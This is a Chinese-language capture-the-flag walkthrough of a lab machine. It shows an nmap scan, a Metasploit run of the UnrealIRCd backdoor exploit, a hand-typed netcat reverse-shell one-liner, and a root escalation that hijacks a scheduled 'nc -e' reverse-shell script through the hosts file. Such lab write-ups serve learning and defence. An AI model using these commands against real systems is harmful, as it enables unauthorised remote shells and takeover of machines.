# 靶场搭建
下载:Real
Nat,IP: 192.168.1.139
# 渗透过程
# 信息初收集
PORT STATE SERVICE VERSION | |
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) | |
| ssh-hostkey: | |
| 2048 db:28:2b:ab:63:2a:0e:d5:ea:18:8d:2f:6d:8c:45:2d (RSA) | |
| 256 cd:a1:c3:2e:20:f0:f3:f6:d3:9b:27:8e:9a:2d:26:11 (ECDSA) | |
|_ 256 db:98:69:a5:8b:bd:05:86:16:3d:9c:8b:30:7b:a3:6c (ED25519) | |
80/tcp open http Apache httpd 2.4.38 ((Debian)) | |
|_http-server-header: Apache/2.4.38 (Debian) | |
|_http-title: Apache2 Debian Default Page: It works | |
6667/tcp open irc UnrealIRCd | |
6697/tcp open irc UnrealIRCd | |
8067/tcp open irc UnrealIRCd |
80 端口没有任何收获, UnrealIRCd 搜出来了攻击模块
payload 好像只能用 perl 的,其他的打过去没反应啊
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > show options | |
Module options (exploit/unix/irc/unreal_ircd_3281_backdoor): | |
Name Current Setting Required Description | |
---- --------------- -------- ----------- | |
CHOST no The local client address | |
CPORT no The local client port | |
Proxies no A proxy chain of format type:host:port[,type:host:port][... | |
] | |
RHOSTS 192.168.1.139 yes The target host(s), see https://docs.metasploit.com/docs/us | |
ing-metasploit/basics/using-metasploit.html | |
RPORT 6667 yes The target port (TCP) | |
Payload options (cmd/unix/reverse_perl): | |
Name Current Setting Required Description | |
---- --------------- -------- ----------- | |
LHOST 192.168.1.129 yes The listen address (an interface may be specified) | |
LPORT 8888 yes The listen port | |
Exploit target: | |
Id Name | |
-- ---- | |
0 Automatic Target | |
View the full module info with the info, or info -d command. | |
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > run | |
[*] Started reverse TCP handler on 192.168.1.129:8888 | |
[*] 192.168.1.139:6667 - Connected to 192.168.1.139:6667... | |
:irc.foonet.com NOTICE AUTH :*** Looking up your hostname... | |
:irc.foonet.com NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead | |
[*] 192.168.1.139:6667 - Sending backdoor command... | |
[*] Command shell session 2 opened (192.168.1.129:8888 -> 192.168.1.139:37974) at 2024-05-18 08:39:20 -0400 | |
id | |
uid=1000(server) gid=1000(server) groups=1000(server) |
searchsploit 里面搜出来 perl 脚本没有尝试,因为他要去外网下脚本,我没开
直接把 payload 提出来发一下应该也 OK: echo "AB;nc -e /bin/sh 192.168.1.129 4444" |nc 192.168.1.139 6667
# 提权
手动搜索无果,上 linpeas.sh 扫一下,发现了 /opt/task
看一下内容
#!/bin/bash | |
domain='shelly.real.nyx' | |
function check(){ | |
timeout 1 bash -c "/usr/bin/ping -c 1 $domain" > /dev/null 2>&1 | |
if [ "$(echo $?)" == "0" ]; then | |
/usr/bin/nohup nc -e /usr/bin/sh $domain 65000 | |
exit 0 | |
else | |
exit 1 | |
fi | |
} | |
check |
有一个反弹脚本啊,那我直接修改本地 host,让他弹到我的机器上
监听 65000 端口,等等看,就拿到 root 权限了
# 小结
后门 + 定时任务 + host 解析
